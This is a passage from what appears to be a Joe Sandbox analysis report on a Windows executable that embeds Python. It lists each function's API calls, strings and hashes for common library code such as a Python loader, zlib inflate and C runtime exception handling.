API ID: CriticalDeleteSection
String ID:
API String ID: 166494926-0
Opcode ID: 6e5b5d88246737fafb05fc0397377e26502a30847781b654ecf110663deedd5b
Instruction ID: 4749bc7fc41a689769ad6d20924c2c8ade8487b5254d571f91907be15d95b2e5
Opcode Fuzzy Hash: 6e5b5d88246737fafb05fc0397377e26502a30847781b654ecf110663deedd5b
Instruction Fuzzy Hash: 6EF01564E18D0781FE80ABA5E8912781394AFB8F75F801571E80EC6263DE2CF4909252

Function 00007FF61E8FEB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF61E8FB32A,?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A), ref: 00007FF61E8FEBED

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction ID: ac42e65bdabd9309c6247290268b169d7d4af1824d5df675f8fd0c19fad06bdd
Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction Fuzzy Hash: 72F06D64B0AA4340FE9966AA98512B502845FB8FB0F4C4932FD0FE63D2ED1CF4804210

Function 00007FF61E8FD5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF61E8F0C90,?,?,?,00007FF61E8F22FA,?,?,?,?,?,00007FF61E8F3AE9), ref: 00007FF61E8FD63A

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: 727148287136bea2a9d8597751ce8922f9e3f5aec07a30aa75e51afd23dbfb39
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: 90F0FE10B19A4785FE956BB1584177512945FA5FB0F480730FE3EC52C3DE2CF4908550

Non-executed Functions

Function 00007FF61E8E5830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E5840
GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E5852
GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E5889
GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E589B
GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E58B4
GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E58C6
GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E58DF
GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E58F1
GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E590D
GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E591F
GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E593B
GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E594D
GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E5969
GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E597B
GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E5997
GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E59A9
GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E59C5
GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E59D7

Strings

PyPreConfig_InitIsolatedConfig, xrefs: 00007FF61E8E5DDD, 00007FF61E8E5DFF
PyUnicode_DecodeFSDefault, xrefs: 00007FF61E8E5F1F, 00007FF61E8E5F41
PyMem_RawFree, xrefs: 00007FF61E8E5C9B, 00007FF61E8E5CBD
PySys_GetObject, xrefs: 00007FF61E8E5E67, 00007FF61E8E5E89
PyObject_CallFunctionObjArgs, xrefs: 00007FF61E8E5D25, 00007FF61E8E5D47
PyObject_GetAttrString, xrefs: 00007FF61E8E5D53, 00007FF61E8E5D75
PyObject_SetAttrString, xrefs: 00007FF61E8E5D81, 00007FF61E8E5DA3
PyErr_Occurred, xrefs: 00007FF61E8E5B2B, 00007FF61E8E5B4D
PyImport_ImportModule, xrefs: 00007FF61E8E5C3F, 00007FF61E8E5C61
PyUnicode_Replace, xrefs: 00007FF61E8E5FD7, 00007FF61E8E5FF9
GetProcAddress, xrefs: 00007FF61E8E5868
PyConfig_SetString, xrefs: 00007FF61E8E5A45, 00007FF61E8E5A67
Py_IsInitialized, xrefs: 00007FF61E8E5931, 00007FF61E8E5953
PyUnicode_FromFormat, xrefs: 00007FF61E8E5F4D, 00007FF61E8E5F6F
PyErr_Print, xrefs: 00007FF61E8E5B59, 00007FF61E8E5B7B
PyUnicode_Decode, xrefs: 00007FF61E8E5EF1, 00007FF61E8E5F13
Py_DecRef, xrefs: 00007FF61E8E5836, 00007FF61E8E5858
PyUnicode_FromString, xrefs: 00007FF61E8E5F7B, 00007FF61E8E5F9D
PyEval_EvalCode, xrefs: 00007FF61E8E5BB5, 00007FF61E8E5BD7
PyImport_AddModule, xrefs: 00007FF61E8E5BE3, 00007FF61E8E5C05
PyConfig_SetWideStringList, xrefs: 00007FF61E8E5A73, 00007FF61E8E5A95
PyModule_GetDict, xrefs: 00007FF61E8E5CC9, 00007FF61E8E5CEB
PyObject_Str, xrefs: 00007FF61E8E5DAF, 00007FF61E8E5DD1
PyStatus_Exception, xrefs: 00007FF61E8E5E39, 00007FF61E8E5E5B
Py_PreInitialize, xrefs: 00007FF61E8E595F, 00007FF61E8E5981
PyConfig_Clear, xrefs: 00007FF61E8E598D, 00007FF61E8E59AF
Py_ExitStatusException, xrefs: 00007FF61E8E58AA, 00007FF61E8E58CC
PyMarshal_ReadObjectFromString, xrefs: 00007FF61E8E5C6D, 00007FF61E8E5C8F
Py_InitializeFromConfig, xrefs: 00007FF61E8E5903, 00007FF61E8E5925
PyUnicode_Join, xrefs: 00007FF61E8E5FA9, 00007FF61E8E5FCB
Failed to get address for %hs, xrefs: 00007FF61E8E5861
PyErr_Clear, xrefs: 00007FF61E8E5AA1, 00007FF61E8E5AC3
PyConfig_SetBytesString, xrefs: 00007FF61E8E5A17, 00007FF61E8E5A39
PyErr_Fetch, xrefs: 00007FF61E8E5ACF, 00007FF61E8E5AF1
PySys_SetObject, xrefs: 00007FF61E8E5E95, 00007FF61E8E5EB7
Py_Finalize, xrefs: 00007FF61E8E58D5, 00007FF61E8E58F7
PyErr_NormalizeException, xrefs: 00007FF61E8E5AFD, 00007FF61E8E5B1F
PyErr_Restore, xrefs: 00007FF61E8E5B87, 00007FF61E8E5BA9
PyImport_ExecCodeModule, xrefs: 00007FF61E8E5C11, 00007FF61E8E5C33
PyRun_SimpleStringFlags, xrefs: 00007FF61E8E5E0B, 00007FF61E8E5E2D
PyConfig_InitIsolatedConfig, xrefs: 00007FF61E8E59BB, 00007FF61E8E59DD
PyConfig_Read, xrefs: 00007FF61E8E59E9, 00007FF61E8E5A0B
PyUnicode_AsUTF8, xrefs: 00007FF61E8E5EC3, 00007FF61E8E5EE5
Py_DecodeLocale, xrefs: 00007FF61E8E587F, 00007FF61E8E58A1
PyObject_CallFunction, xrefs: 00007FF61E8E5CF7, 00007FF61E8E5D19

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: fe106041304a18c5bbc47404e4e51ff7479419f443402a1dcedc7fa790f4516b
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: 2522B7B4909F4792FA599F56B8105B522A8AF34F71F845835F82FC22A6FF3CF5488250

Function 00007FF61E9040AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF61E9040FA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E904766
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E9048DC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E904B9A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E904DBA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E904FF7
memcpy_s.LIBCPMT ref: 00007FF61E9050D2
memcpy_s.LIBCPMT ref: 00007FF61E90517D
memcpy_s.LIBCPMT ref: 00007FF61E90524C

Strings

1#QNAN, xrefs: 00007FF61E904213
1#SNAN, xrefs: 00007FF61E90420A
1#IND, xrefs: 00007FF61E9041E7
1#INF, xrefs: 00007FF61E904223

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction ID: 7be5d62c7620679aadc18d939ccf8e4567d06a17745c51610f0805d50799276e
Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction Fuzzy Hash: ADB2D772A18A828BE7758E64D4407FD37A9FB64B54F805935EA0DD7A86DF38F900CB40

Function 00007FF61E8EACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid distances set, xrefs: 00007FF61E8EB1A0
invalid code -- missing end-of-block, xrefs: 00007FF61E8EB0C6
invalid distance too far back, xrefs: 00007FF61E8EB670
invalid literal/length code, xrefs: 00007FF61E8EB3E2
invalid bit length repeat, xrefs: 00007FF61E8EB099
too many length or distance symbols, xrefs: 00007FF61E8EAE46
invalid code lengths set, xrefs: 00007FF61E8EAE2D
invalid literal/lengths set, xrefs: 00007FF61E8EB133
invalid distance code, xrefs: 00007FF61E8EB5B4

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
Instruction ID: c4e5fc63f6802057278b129e54b3eaccf497d81633272808d461dea08efeca15
Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
Instruction Fuzzy Hash: DD52E472A14EA68BD7A48F15C498B7E7BA9FB94B50F014139F64A87780DF3DE844CB40

Function 00007FF61E8ED12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF61E8ED148
RtlCaptureContext.KERNEL32 ref: 00007FF61E8ED175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF61E8ED18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF61E8ED1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF61E8ED224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF61E8ED241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF61E8ED24C

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: 6be89a6105a6e4df1c4719b16ea054a33022aca358113c0e9023f3226636e5e2
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: 2B314576608F8186EB608F65E8403ED7364FBA4B54F444439EA4E87B95EF7CE548C710

Function 00007FF61E8FA614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF61E8FA68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF61E8FA6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF61E8FA6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF61E8FA719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF61E8FA723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF61E8FA72E

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: 5b4e604ace667df9b75f8c4276a494a9da5e562f0b23b7ec25c1acafe276955f
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: B6318636618F8186DB60CF25E8406AE73A4FBA8B64F540535FA9D83B95EF3CE155CB00

Function 00007FF61E901874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E9018C0
FindFirstFileExW.KERNEL32 ref: 00007FF61E9019CA

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction ID: e8783b47e4f8fe10ce2f88fd6df2caec141d2914a06ee154b991034f2f700ffd
Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction Fuzzy Hash: 1DB192B2B18E9241EA619B26A5001B963D9EB64FF4F845531FE5DC7B8AEF3CF4418300

Function 00007FF61E8ED010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF61E8ED03C
GetCurrentThreadId.KERNEL32 ref: 00007FF61E8ED04A
GetCurrentProcessId.KERNEL32 ref: 00007FF61E8ED056
QueryPerformanceCounter.KERNEL32 ref: 00007FF61E8ED066

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: 8114b642c38e32cf67cc62ce1ccccea6315c8e181b1817295d52a488956ebaaa
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: AF111F32B14F058AEB00CF64E8542B933A4F769B68F440E35EA5D867A5EF78E1548340

Function 00007FF61E903C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF61E903C76
memcpy_s.LIBCPMT ref: 00007FF61E903CA1

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: e6e54404d65311344987a05e55eb942cd5acc349a73aa82888d0d30d87000fa1
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: ACC1E372B18A8687EB24CF15A04466AB7A5F7A4B94F808634EB4ED3745DF3DF901CB40

Function 00007FF61E8EA474 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

unknown header flags set, xrefs: 00007FF61E8EA4C5
header crc mismatch, xrefs: 00007FF61E8EA921
, xrefs: 00007FF61E8EA55B

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
Instruction ID: 71213ce7745a5b7ce94c0c2795c4bcb4f825e6fafb025113fbefe43d4165e9d3
Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
Instruction Fuzzy Hash: C5F1A372A08FD58BE7E59B16C088A3A7AA9EF65F50F064578EA4997390DF38F440C740

Function 00007FF61E909728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF61E909977
RaiseException.KERNEL32 ref: 00007FF61E909988

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction ID: f04a1724afcdefce428b29e38f352c6ffe76e0e51fb5ac9d8f5f878c5eb71243
Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction Fuzzy Hash: CCB15D77A04B898BEB19CF29C8463687BA4F784F58F588921EA5DC37A5CF39E451C700

Function 00007FF61E8F39A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF61E8F3B12
, xrefs: 00007FF61E8F3D54

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction ID: eff2547825c8ba336ff48e8f3aedc43f4c243eecb9eb90ab6dfc78366ac50630
Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction Fuzzy Hash: F9E19232A08E4686EBE99F2A855013D33A0FF65F68F245235EA4E87794DF2DF851C740

Function 00007FF61E8EA2DB Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

incorrect header check, xrefs: 00007FF61E8EA45B
invalid window size, xrefs: 00007FF61E8EA442

Memory Dump Source

